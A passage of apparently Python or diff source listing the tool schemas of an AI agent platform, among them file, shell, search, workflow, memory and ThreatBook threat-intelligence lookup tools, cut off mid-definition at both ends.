read or manage the current todo list.', 'parameters': {'type': 'object', 'properties': {'action': {'type': 'string', 'enum': ['read', 'write']}, 'todos': {'type': 'array', 'items': {'type': 'object'}}}, 'required': ['action']}}}, {'type': 'function', 'function': {'name': 'question', 'description': "Ask the user a question and wait for their response.\n\nUse this tool when you need to:\n- Confirm before making significant changes\n- Get user preference between multiple options\n- Clarify ambiguous instructions\n\nQuestion format:\n- Each question has a text prompt\n- Optional header for context\n- List of options for the user to choose from\n- Options have label and optional description\n\nThe user's answers will be returned for you to continue with.", 'parameters': {'type': 'object', 'properties': {'questions': {'type': 'array', 'items': {'type': 'object', 'properties': {'question': {'type': 'string', 'description': 'Question text prompt'}, 'header': {'type': 'string', 'description': 'Optional header/context for the question'}, 'options': {'type': 'array', 'description': 'Options for the user to select', 'items': {'anyOf': [{'type': 'string'}, {'type': 'object', 'properties': {'label': {'type': 'string'}, 'description': {'type': 'string'}}, 'required': ['label'], 'additionalProperties': False}]}}}, 'required': ['question'], 'additionalProperties': True}, 'description': 'Array of questions to ask the user'}}, 'required': ['questions']}}}, {'type': 'function', 'function': {'name': 'task', 'description': 'Launch a new agent to handle complex, multi-step tasks autonomously.\n\nUse this tool when:\n- The task requires multiple steps or research\n- You need to explore code in parallel\n- The task can be delegated to a specialized agent\n\nAvailable subagent types:\n- general: General-purpose agent for multi-step tasks\n- explore: Fast code exploration agent for quick searches\n- review: Code review agent (if available)\n\nUsage notes:\n- Provide a clear description (3-5 words)\n- Provide detailed prompt with context\n- The subagent runs autonomously and returns results\n- Use for tasks that can be parallelized', 'parameters': {'type': 'object', 'properties': {'description': {'type': 'string', 'description': 'A short (3-5 words) description of the task'}, 'prompt': {'type': 'string', 'description': 'The task for the agent to perform'}, 'subagent_type': {'type': 'string', 'description': 'The type of specialized agent to use (general, explore, review)', 'enum': ['general', 'explore', 'review']}, 'session_id': {'type': 'string', 'description': 'Optional existing session ID to continue'}}, 'required': ['description', 'prompt', 'subagent_type']}}}, {'type': 'function', 'function': {'name': 'batch', 'description': 'Execute multiple tool calls in parallel for optimal performance.\n\nUse this tool when:\n- You need to run multiple independent operations\n- Operations don\'t depend on each other\'s results\n- You want to maximize throughput\n\nLimitations:\n- Maximum 25 tool calls per batch\n- Cannot batch the \'batch\' tool itself\n- External tools (MCP) cannot be batched\n\nFormat:\n- tool_calls: Array of {tool: "tool_name", parameters: {...}}', 'parameters': {'type': 'object', 'properties': {'tool_calls': {'type': 'array', 'description': 'Array of tool calls to execute in parallel', 'items': {'type': 'string'}}}, 'required': ['tool_calls']}}}, {'type': 'function', 'function': {'name': 'lsp', 'description': 'Perform LSP (Language Server Protocol) operations for code intelligence.\n\nSupported operations:\n- goToDefinition: Jump to where a symbol is defined\n- findReferences: Find all usages of a symbol\n- hover: Get type/documentation info for a symbol\n- documentSymbol: List all symbols in a file\n- workspaceSymbol: Search symbols across workspace\n- goToImplementation: Find implementations of an interface\n- prepareCallHierarchy: Get call hierarchy item at position\n- incomingCalls: Find callers of a function\n- outgoingCalls: Find functions called by a function\n\nParameters:\n- operation: The LSP operation to perform\n- filePath: Path to the file\n- line: Line number (1-based)\n- character: Character offset (1-based)', 'parameters': {'type': 'object', 'properties': {'operation': {'type': 'string', 'description': 'The LSP operation to perform', 'enum': ['goToDefinition', 'findReferences', 'hover', 'documentSymbol', 'workspaceSymbol', 'goToImplementation', 'prepareCallHierarchy', 'incomingCalls', 'outgoingCalls']}, 'filePath': {'type': 'string', 'description': 'The absolute or relative path to the file'}, 'line': {'type': 'integer', 'description': 'The line number (1-based, as shown in editors)'}, 'character': {'type': 'integer', 'description': 'The character offset (1-based, as shown in editors)'}}, 'required': ['operation', 'filePath', 'line', 'character']}}}, {'type': 'function', 'function': {'name': 'skill', 'description': "Load a skill to get detailed instructions for a specific task. Skills provide specialized knowledge and step-by-step guidance. Use this when a task matches an available skill's description. <available_skills>   <skill>     <name>workflow-generator</name>     <description>根据自然语言描述生成 flocks 内置工作流（workflow.md, workflow.json, workflow.html）。当用户提出创建/设计/生成/搭建工作流或任何多步骤流程（如告警调查、事件响应、SOP/Runbook 自动化）时使用本 skill。</description>   </skill>   <skill>     <name>tool-builder</name>     <description>Creates a new Flocks tool from user requirements, writes metadata, adds unit tests, and hot-reloads the tool without restarting. Use when the user asks to create a new tool, add a new API integration, or generate a tool from a requirement.</description>   </skill> </available_skills>", 'parameters': {'type': 'object', 'properties': {'name': {'type': 'string', 'description': 'The skill identifier from available_skills'}}, 'required': ['name']}}}, {'type': 'function', 'function': {'name': 'run_workflow', 'description': 'Execute a workflow definition using the flocks-workflow runtime.\n\nWhen to use:\n- You need to execute a workflow.\n- You have an existing JSON/dict structure or a workflow JSON file and user request to execute it.\n- Execute workflow when workflow has been generated.\n\nHow to use:\n- Provide the workflow definition (dictionary, JSON string, or file path).\n- The workflow file path should be an absolute path. IMPORTANT: In JSON, file paths must be quoted strings (e.g. "workflow": "/path/to/workflow.json"). Unquoted paths will cause parse errors.\n- Optional: Provide input parameters, timeout settings, and whether to use LLM for logic node codegen.\n\nNote:\n- This tool depends on an existing workflow file.\n- workflow maybe execute failed, you need to check the workflow file and the input parameters. If execute failed, change parameters and fix workflow-exec.json (don\'t change workflow.json).\n- If no workflow file exists, ask user to specify the workflow file path or use the `workflow-generator` skill to create.', 'parameters': {'type': 'object', 'properties': {'workflow': {'anyOf': [{'type': 'object', 'description': 'Workflow definition as an object (dict)'}, {'type': 'string', 'description': 'Workflow JSON string or a workflow JSON file path'}], 'description': 'Workflow definition (dict). If passing a string, provide a JSON string or a workflow JSON file path.'}, 'inputs': {'type': 'object', 'additionalProperties': True, 'description': 'Input parameters for the workflow execution', 'default': {}}, 'use_llm': {'type': 'boolean', 'description': 'Enable LLM-backed code generation for `type="logic"` nodes (when code is missing). Recommended to keep enabled for logic-node workflows.', 'default': True}, 'ensure_requirements': {'type': 'boolean', 'description': 'Whether to automatically install requirements declared in workflow metadata', 'default': True}, 'timeout_s': {'type': 'number', 'description': 'Execution timeout in seconds (optional)'}, 'trace': {'type': 'boolean', 'description': 'Enable execution tracing for debugging', 'default': False}}, 'required': ['workflow']}}}, {'type': 'function', 'function': {'name': 'websearch', 'description': "Search the web for real-time information about any topic.\n\nUse this tool when you need:\n- Up-to-date information that might not be in training data\n- Current events or technology news\n- Documentation for libraries, frameworks, or tools\n- Verification of current facts\n\nToday's date: 2026-02-11\nUse the current year when searching for recent information.\n\nParameters:\n- query: Search query (be specific for better results)\n- numResults: Number of results to return (default: 8)\n- type: Search type - auto, fast, or deep", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Web search query'}, 'numResults': {'type': 'integer', 'description': 'Number of search results to return (default: 8)', 'default': 8}, 'type': {'type': 'string', 'description': "Search type - 'auto': balanced, 'fast': quick, 'deep': comprehensive", 'default': 'auto', 'enum': ['auto', 'fast', 'deep']}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'codesearch', 'description': "Search for security examples, documentation, and API usage patterns.\n\nUse this tool when you need:\n- Security examples for a specific tool or framework\n- API documentation and usage patterns\n- Best practices for specific programming tasks\n- Implementation references\n\nParameters:\n- query: Search query (e.g., 'YARA malware detection rules', 'Suricata IDS signatures')\n- tokensNum: Amount of context to return (1000-50000, default: 5000)\n\nTips:\n- Be specific about the security tool/framework\n- Include the security tool or technology if relevant\n- Use higher tokensNum for comprehensive documentation", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': "Search query for security context (e.g., 'YARA malware detection rules')"}, 'tokensNum': {'type': 'integer', 'description': 'Number of tokens to return (1000-50000, default: 5000)', 'default': 5000}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'apply_patch', 'description': 'Apply a patch to modify files.\n\nThis tool is designed for advanced patch-based editing, supporting:\n- File creation (add)\n- File modification (update)\n- File deletion (delete)\n- File moves (update with move_path)\n\nPatch format:\n*** Begin Patch\n*** Add File: path/to/new/file.py\ncontent of new file\n*** Update File: path/to/existing/file.py\n@@@ ... @@@\n-old line\n+new line\n*** Delete File: path/to/delete.py\n*** End Patch\n\nUse the edit tool for simple string replacements.\nUse apply_patch for complex multi-file changes.', 'parameters': {'type': 'object', 'properties': {'patchText': {'type': 'string', 'description': 'The full patch text that describes all changes to be made'}}, 'required': ['patchText']}}}, {'type': 'function', 'function': {'name': 'memory_search', 'description': 'Search project memory using a natural language query.', 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Natural language search query.'}, 'max_results': {'type': 'integer', 'description': 'Maximum number of results to return (default: 10).'}, 'min_score': {'type': 'number', 'description': 'Minimum similarity score 0-1 (default: 0.6).'}, 'sources': {'type': 'array', 'description': "Sources to search: ['memory', 'session'] (default: ['memory']).", 'items': {'type': 'string'}}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'memory_get', 'description': 'Retrieve memory file content by path, optionally filtered by line range.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'Memory file path relative to memory root.'}, 'from_line': {'type': 'integer', 'description': 'Starting line number (1-based).'}, 'lines': {'type': 'integer', 'description': 'Number of lines to return.'}}, 'required': ['path']}}}, {'type': 'function', 'function': {'name': 'memory_write', 'description': 'Write content to memory files for long-term recall.', 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'Content to write to memory.'}, 'path': {'type': 'string', 'description': 'Target path relative to memory root (default: YYYY-MM-DD.md).'}, 'append': {'type': 'boolean', 'description': 'Append to existing file (default: true).'}}, 'required': ['content']}}}, {'type': 'function', 'function': {'name': 'echo', 'description': 'Echo back the input message', 'parameters': {'type': 'object', 'properties': {'message': {'type': 'string', 'description': 'Message to echo'}}, 'required': ['message']}}}, {'type': 'function', 'function': {'name': 'get_time', 'description': 'Get current date and time', 'parameters': {'type': 'object', 'properties': {}}}}, {'type': 'function', 'function': {'name': 'threatbook_ip_query', 'description': "Query IP address threat intelligence from ThreatBook API. Use this tool to get threat information about an IP address, including geographic location, threat severity, malicious behavior indicators, and security judgments. Example: To query '8.8.8.8', pass ip='8.8.8.8'.", 'parameters': {'type': 'object', 'properties': {'ip': {'type': 'string', 'description': "The IP address to query (e.g., '8.8.8.8', '192.168.1.1'). This is a required parameter and must be a valid IP address string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['ip']}}}, {'type': 'function', 'function': {'name': 'threatbook_domain_query', 'description': "Query domain threat intelligence from ThreatBook API. Use this tool to get threat information about a domain, including DNS records, WHOIS data, threat severity, and security judgments. Example: To query 'example.com', pass domain='example.com'.", 'parameters': {'type': 'object', 'properties': {'domain': {'type': 'string', 'description': "The domain name to query (e.g., 'example.com', 'google.com'). This is a required parameter and must be a valid domain name string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['domain']}}}, {'type': 'function', 'function': {'name': 'threatbook_file_query', 'description': "Query file hash threat intelligence from ThreatBook API. Use this tool to get malware analysis results, antivirus detection results, and threat information about a file hash. Supports MD5, SHA1, and SHA256 hashes. Example: To query a hash, pass file_hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'.", 'parameters': {'type': 'object', 'properties': {'file_hash': {'type': 'string', 'description': "The file hash to query. Can be MD5, SHA1, or SHA256 format (e.g., 'a1b2c3d4...', '5e6f7a8b...'). This is a required parameter and must be a valid hash string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['file_hash']}}}]
+TOOLS = [{'type': 'function', 'function': {'name': 'read', 'description': "Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The filePath parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- You may call multiple independent tools in the same response. Prefer separate parallel Read calls when multiple files are likely to be useful.\n- If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.\n- You can read image files using this tool.", 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The path to the file to read'}, 'offset': {'type': 'integer', 'description': 'The line number to start reading from (0-based)', 'default': 0}, 'limit': {'type': 'integer', 'description': 'The number of lines to read (defaults to 2000)', 'default': 2000}}, 'required': ['filePath']}}}, {'type': 'function', 'function': {'name': 'write', 'description': "Writes a file to the local filesystem.\n\nUsage:\n- This tool will overwrite the existing file if there is one at the provided path.\n- If this is an existing file, you MUST use the Read tool first to read the file's contents. This tool will fail if you did not read the file first.\n- ALWAYS prefer editing existing files in the codebase. NEVER write new files unless explicitly required.\n- NEVER proactively create documentation files (*.md) or README files. Only create documentation files if explicitly requested by the User.\n- Only use emojis if the user explicitly requests it. Avoid writing emojis to files unless asked.", 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'The content to write to the file'}, 'filePath': {'type': 'string', 'description': 'The absolute path to the file to write (must be absolute, not relative)'}}, 'required': ['content', 'filePath']}}}, {'type': 'function', 'function': {'name': 'edit', 'description': 'Performs exact string replacements in files. \n\nUsage:\n- You must use your `Read` tool at least once in the conversation before editing. This tool will error if you attempt an edit without reading the file. \n- When editing text from Read tool output, ensure you preserve the exact indentation (tabs/spaces) as it appears AFTER the line number prefix. The line number prefix format is: spaces + line number + tab. Everything after that tab is the actual file content to match. Never include any part of the line number prefix in the oldString or newString.\n- ALWAYS prefer editing existing files in the codebase. NEVER write new files unless explicitly required.\n- Only use emojis if the user explicitly requests it. Avoid adding emojis to files unless asked.\n- The edit will FAIL if `oldString` is not found in the file with an error "oldString not found in content".\n- The edit will FAIL if `oldString` is found multiple times in the file with an error "oldString found multiple times and requires more code context to uniquely identify the intended match". Either provide a larger string with more surrounding context to make it unique or use `replaceAll` to change every instance of `oldString`. \n- Use `replaceAll` for replacing and renaming strings across the file. This parameter is useful if you want to rename a variable for instance.', 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The absolute path to the file to modify'}, 'oldString': {'type': 'string', 'description': 'The text to replace'}, 'newString': {'type': 'string', 'description': 'The text to replace it with (must be different from oldString)'}, 'replaceAll': {'type': 'boolean', 'description': 'Replace all occurrences of oldString (default false)', 'default': False}}, 'required': ['filePath', 'oldString', 'newString']}}}, {'type': 'function', 'function': {'name': 'bash', 'description': 'Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nAll commands run in /Users/chenjie/Library/Mobile Documents/com~apple~CloudDocs/0_work/projects/threatbook/flocks by default. Use the `workdir` parameter if you need to run a command in a different directory. AVOID using `cd <directory> && <command>` patterns - use `workdir` instead.\n\nIMPORTANT: This tool is for terminal operations like git, npm, docker, etc. DO NOT use it for file operations (reading, writing, editing, searching, finding files) - use the specialized tools for this instead.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n   - If the command will create new directories or files, first use `ls` to verify the parent directory exists and is the correct location\n   - For example, before running "mkdir foo/bar", first use `ls foo` to check that "foo" exists and is the intended parent directory\n\n2. Command Execution:\n   - Always quote file paths that contain spaces with double quotes (e.g., rm "path with spaces/file.txt")\n   - Examples of proper quoting:\n     - mkdir "/Users/name/My Documents" (correct)\n     - mkdir /Users/name/My Documents (incorrect - will fail)\n     - python "/path/with spaces/script.py" (correct)\n     - python /path/with spaces/script.py (incorrect - will fail)\n   - After ensuring proper quoting, execute the command.\n   - Capture the output of the command.\n\nUsage notes:\n  - The command argument is required.\n  - You can specify an optional timeout in milliseconds. If not specified, commands will time out after 120000ms (2 minutes).\n  - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n  - If the output exceeds 1000 lines or 102400 bytes, it will be truncated and the full output will be written to a file.\n  - Avoid using Bash with the `find`, `grep`, `cat`, `head`, `tail`, `sed`, `awk`, or `echo` commands. Instead, use the dedicated tools: Glob, Grep, Read, Edit, Write.\n  - When issuing multiple commands:\n    - If the commands are independent and can run in parallel, make multiple Bash tool calls in a single message.\n    - If the commands depend on each other, use a single Bash call with \'&&\' to chain them together.\n    - Use \';\' only when you need to run commands sequentially but don\'t care if earlier commands fail\n  - AVOID using `cd <directory> && <command>`. Use the `workdir` parameter to change directories instead.', 'parameters': {'type': 'object', 'properties': {'command': {'type': 'string', 'description': 'The command to execute'}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in milliseconds', 'default': 120000}, 'workdir': {'type': 'string', 'description': 'The working directory to run the command in. Defaults to project directory.'}, 'description': {'type': 'string', 'description': 'Clear, concise description of what this command does in 5-10 words'}}, 'required': ['command']}}}, {'type': 'function', 'function': {'name': 'grep', 'description': '- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. "log.*Error", "function\\s+\\w+", etc.)\n- Filter files by pattern with the include parameter (eg. "*.js", "*.{ts,tsx}")\n- Returns file paths and line numbers with at least one match sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- If you need to identify/count the number of matches within files, use the Bash tool with `rg` (ripgrep) directly. Do NOT use `grep`.\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The regex pattern to search for in file contents'}, 'path': {'type': 'string', 'description': 'The directory to search in. Defaults to the current working directory.'}, 'include': {'type': 'string', 'description': 'File pattern to include in the search (e.g. "*.js", "*.{ts,tsx}")'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'glob', 'description': '- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like "**/*.js" or "src/**/*.ts"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead\n- You may call multiple independent tools in the same response. Prefer separate parallel Glob calls when multiple searches are likely to be useful.', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The glob pattern to match files against'}, 'path': {'type': 'string', 'description': 'The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter "undefined" or "null" - simply omit it for the default behavior.'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'list', 'description': 'Lists files and directories in a given path. The path parameter must be absolute; omit it to use the current workspace directory. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'The absolute path to the directory to list (must be absolute, not relative)'}, 'ignore': {'type': 'array', 'description': 'List of glob patterns to ignore', 'items': {'type': 'string'}}}}}}, {'type': 'function', 'function': {'name': 'webfetch', 'description': 'Fetch content from a specified URL and return its contents in a readable format.\n\nUsage:\n- The URL must be a fully-formed, valid URL starting with http:// or https://\n- By default, returns content in markdown format (HTML is converted)\n- Supports text, markdown, and html output formats\n- Has a default timeout of 30 seconds (configurable up to 120 seconds)\n- Response size is limited to 5MB', 'parameters': {'type': 'object', 'properties': {'url': {'type': 'string', 'description': 'The URL to fetch content from'}, 'format': {'type': 'string', 'description': 'The format to return content in (text, markdown, or html). Defaults to markdown.', 'default': 'markdown', 'enum': ['text', 'markdown', 'html']}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in seconds (max 120)', 'default': 30}}, 'required': ['url']}}}, {'type': 'function', 'function': {'name': 'todo', 'description': 'Use this tool to read or manage the current todo list.', 'parameters': {'type': 'object', 'properties': {'action': {'type': 'string', 'enum': ['read', 'write']}, 'todos': {'type': 'array', 'items': {'type': 'object'}}}, 'required': ['action']}}}, {'type': 'function', 'function': {'name': 'question', 'description': "Ask the user a question and wait for their response.\n\nUse this tool when you need to:\n- Confirm before making significant changes\n- Get user preference between multiple options\n- Clarify ambiguous instructions\n\nQuestion format:\n- Each question has a text prompt\n- Optional header for context\n- List of options for the user to choose from\n- Options have label and optional description\n\nThe user's answers will be returned for you to continue with.", 'parameters': {'type': 'object', 'properties': {'questions': {'type': 'array', 'items': {'type': 'object', 'properties': {'question': {'type': 'string', 'description': 'Question text prompt'}, 'header': {'type': 'string', 'description': 'Optional header/context for the question'}, 'options': {'type': 'array', 'description': 'Options for the user to select', 'items': {'anyOf': [{'type': 'string'}, {'type': 'object', 'properties': {'label': {'type': 'string'}, 'description': {'type': 'string'}}, 'required': ['label'], 'additionalProperties': False}]}}}, 'required': ['question'], 'additionalProperties': True}, 'description': 'Array of questions to ask the user'}}, 'required': ['questions']}}}, {'type': 'function', 'function': {'name': 'task', 'description': 'Launch a new agent to handle complex, multi-step tasks autonomously.\n\nUse this tool when:\n- The task requires multiple steps or research\n- You need to explore code in parallel\n- The task can be delegated to a specialized agent\n\nAvailable subagent types:\n- general: General-purpose agent for multi-step tasks\n- explore: Fast code exploration agent for quick searches\n- review: Code review agent (if available)\n\nUsage notes:\n- Provide a clear description (3-5 words)\n- Provide detailed prompt with context\n- The subagent runs autonomously and returns results\n- Use for tasks that can be parallelized', 'parameters': {'type': 'object', 'properties': {'description': {'type': 'string', 'description': 'A short (3-5 words) description of the task'}, 'prompt': {'type': 'string', 'description': 'The task for the agent to perform'}, 'subagent_type': {'type': 'string', 'description': 'The type of specialized agent to use (general, explore, review)', 'enum': ['general', 'explore', 'review']}, 'session_id': {'type': 'string', 'description': 'Optional existing session ID to continue'}}, 'required': ['description', 'prompt', 'subagent_type']}}}, {'type': 'function', 'function': {'name': 'lsp', 'description': 'Perform LSP (Language Server Protocol) operations for code intelligence.\n\nSupported operations:\n- goToDefinition: Jump to where a symbol is defined\n- findReferences: Find all usages of a symbol\n- hover: Get type/documentation info for a symbol\n- documentSymbol: List all symbols in a file\n- workspaceSymbol: Search symbols across workspace\n- goToImplementation: Find implementations of an interface\n- prepareCallHierarchy: Get call hierarchy item at position\n- incomingCalls: Find callers of a function\n- outgoingCalls: Find functions called by a function\n\nParameters:\n- operation: The LSP operation to perform\n- filePath: Path to the file\n- line: Line number (1-based)\n- character: Character offset (1-based)', 'parameters': {'type': 'object', 'properties': {'operation': {'type': 'string', 'description': 'The LSP operation to perform', 'enum': ['goToDefinition', 'findReferences', 'hover', 'documentSymbol', 'workspaceSymbol', 'goToImplementation', 'prepareCallHierarchy', 'incomingCalls', 'outgoingCalls']}, 'filePath': {'type': 'string', 'description': 'The absolute or relative path to the file'}, 'line': {'type': 'integer', 'description': 'The line number (1-based, as shown in editors)'}, 'character': {'type': 'integer', 'description': 'The character offset (1-based, as shown in editors)'}}, 'required': ['operation', 'filePath', 'line', 'character']}}}, {'type': 'function', 'function': {'name': 'skill', 'description': "Load a skill to get detailed instructions for a specific task. Skills provide specialized knowledge and step-by-step guidance. Use this when a task matches an available skill's description. <available_skills>   <skill>     <name>workflow-generator</name>     <description>根据自然语言描述生成 flocks 内置工作流（workflow.md, workflow.json, workflow.html）。当用户提出创建/设计/生成/搭建工作流或任何多步骤流程（如告警调查、事件响应、SOP/Runbook 自动化）时使用本 skill。</description>   </skill>   <skill>     <name>tool-builder</name>     <description>Creates a new Flocks tool from user requirements, writes metadata, adds unit tests, and hot-reloads the tool without restarting. Use when the user asks to create a new tool, add a new API integration, or generate a tool from a requirement.</description>   </skill> </available_skills>", 'parameters': {'type': 'object', 'properties': {'name': {'type': 'string', 'description': 'The skill identifier from available_skills'}}, 'required': ['name']}}}, {'type': 'function', 'function': {'name': 'run_workflow', 'description': 'Execute a workflow definition using the flocks-workflow runtime.\n\nWhen to use:\n- You need to execute a workflow.\n- You have an existing JSON/dict structure or a workflow JSON file and user request to execute it.\n- Execute workflow when workflow has been generated.\n\nHow to use:\n- Provide the workflow definition (dictionary, JSON string, or file path).\n- The workflow file path should be an absolute path. IMPORTANT: In JSON, file paths must be quoted strings (e.g. "workflow": "/path/to/workflow.json"). Unquoted paths will cause parse errors.\n- Optional: Provide input parameters, timeout settings, and whether to use LLM for logic node codegen.\n\nNote:\n- This tool depends on an existing workflow file.\n- workflow maybe execute failed, you need to check the workflow file and the input parameters. If execute failed, change parameters and fix workflow-exec.json (don\'t change workflow.json).\n- If no workflow file exists, ask user to specify the workflow file path or use the `workflow-generator` skill to create.', 'parameters': {'type': 'object', 'properties': {'workflow': {'anyOf': [{'type': 'object', 'description': 'Workflow definition as an object (dict)'}, {'type': 'string', 'description': 'Workflow JSON string or a workflow JSON file path'}], 'description': 'Workflow definition (dict). If passing a string, provide a JSON string or a workflow JSON file path.'}, 'inputs': {'type': 'object', 'additionalProperties': True, 'description': 'Input parameters for the workflow execution', 'default': {}}, 'use_llm': {'type': 'boolean', 'description': 'Enable LLM-backed code generation for `type="logic"` nodes (when code is missing). Recommended to keep enabled for logic-node workflows.', 'default': True}, 'ensure_requirements': {'type': 'boolean', 'description': 'Whether to automatically install requirements declared in workflow metadata', 'default': True}, 'timeout_s': {'type': 'number', 'description': 'Execution timeout in seconds (optional)'}, 'trace': {'type': 'boolean', 'description': 'Enable execution tracing for debugging', 'default': False}}, 'required': ['workflow']}}}, {'type': 'function', 'function': {'name': 'websearch', 'description': "Search the web for real-time information about any topic.\n\nUse this tool when you need:\n- Up-to-date information that might not be in training data\n- Current events or technology news\n- Documentation for libraries, frameworks, or tools\n- Verification of current facts\n\nToday's date: 2026-02-11\nUse the current year when searching for recent information.\n\nParameters:\n- query: Search query (be specific for better results)\n- numResults: Number of results to return (default: 8)\n- type: Search type - auto, fast, or deep", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Web search query'}, 'numResults': {'type': 'integer', 'description': 'Number of search results to return (default: 8)', 'default': 8}, 'type': {'type': 'string', 'description': "Search type - 'auto': balanced, 'fast': quick, 'deep': comprehensive", 'default': 'auto', 'enum': ['auto', 'fast', 'deep']}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'codesearch', 'description': "Search for security examples, documentation, and API usage patterns.\n\nUse this tool when you need:\n- Security examples for a specific tool or framework\n- API documentation and usage patterns\n- Best practices for specific programming tasks\n- Implementation references\n\nParameters:\n- query: Search query (e.g., 'YARA malware detection rules', 'Suricata IDS signatures')\n- tokensNum: Amount of context to return (1000-50000, default: 5000)\n\nTips:\n- Be specific about the security tool/framework\n- Include the security tool or technology if relevant\n- Use higher tokensNum for comprehensive documentation", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': "Search query for security context (e.g., 'YARA malware detection rules')"}, 'tokensNum': {'type': 'integer', 'description': 'Number of tokens to return (1000-50000, default: 5000)', 'default': 5000}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'apply_patch', 'description': 'Apply a patch to modify files.\n\nThis tool is designed for advanced patch-based editing, supporting:\n- File creation (add)\n- File modification (update)\n- File deletion (delete)\n- File moves (update with move_path)\n\nPatch format:\n*** Begin Patch\n*** Add File: path/to/new/file.py\ncontent of new file\n*** Update File: path/to/existing/file.py\n@@@ ... @@@\n-old line\n+new line\n*** Delete File: path/to/delete.py\n*** End Patch\n\nUse the edit tool for simple string replacements.\nUse apply_patch for complex multi-file changes.', 'parameters': {'type': 'object', 'properties': {'patchText': {'type': 'string', 'description': 'The full patch text that describes all changes to be made'}}, 'required': ['patchText']}}}, {'type': 'function', 'function': {'name': 'memory_search', 'description': 'Search project memory using a natural language query.', 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Natural language search query.'}, 'max_results': {'type': 'integer', 'description': 'Maximum number of results to return (default: 10).'}, 'min_score': {'type': 'number', 'description': 'Minimum similarity score 0-1 (default: 0.6).'}, 'sources': {'type': 'array', 'description': "Sources to search: ['memory', 'session'] (default: ['memory']).", 'items': {'type': 'string'}}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'memory_get', 'description': 'Retrieve memory file content by path, optionally filtered by line range.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'Memory file path relative to memory root.'}, 'from_line': {'type': 'integer', 'description': 'Starting line number (1-based).'}, 'lines': {'type': 'integer', 'description': 'Number of lines to return.'}}, 'required': ['path']}}}, {'type': 'function', 'function': {'name': 'memory_write', 'description': 'Write content to memory files for long-term recall.', 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'Content to write to memory.'}, 'path': {'type': 'string', 'description': 'Target path relative to memory root (default: YYYY-MM-DD.md).'}, 'append': {'type': 'boolean', 'description': 'Append to existing file (default: true).'}}, 'required': ['content']}}}, {'type': 'function', 'function': {'name': 'echo', 'description': 'Echo back the input message', 'parameters': {'type': 'object', 'properties': {'message': {'type': 'string', 'description': 'Message to echo'}}, 'required': ['message']}}}, {'type': 'function', 'function': {'name': 'get_time', 'description': 'Get current date and time', 'parameters': {'type': 'object', 'properties': {}}}}, {'type': 'function', 'function': {'name': 'threatbook_ip_query', 'description': "Query IP address threat intelligence from ThreatBook API. Use this tool to get threat information about an IP address, including geographic location, threat severity, malicious behavior indicators, and security judgments. Example: To query '8.8.8.8', pass ip='8.8.8.8'.", 'parameters': {'type': 'object', 'properties': {'ip': {'type': 'string', 'description': "The IP address to query (e.g., '8.8.8.8', '192.168.1.1'). This is a required parameter and must be a valid IP address string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['ip']}}}, {'type': 'function', 'function': {'name': 'threatbook_domain_query', 'description': "Query domain threat intelligence from ThreatBook API. Use this tool to get threat information about a domain, including DNS records, WHOIS data, threat severity, and security judgments. Example: To query 'example.com', pass domain='example.com'.", 'parameters': {'type': 'object', 'properties': {'domain': {'type': 'string', 'description': "The domain name to query (e.g., 'example.com', 'google.com'). This is a required parameter and must be a valid 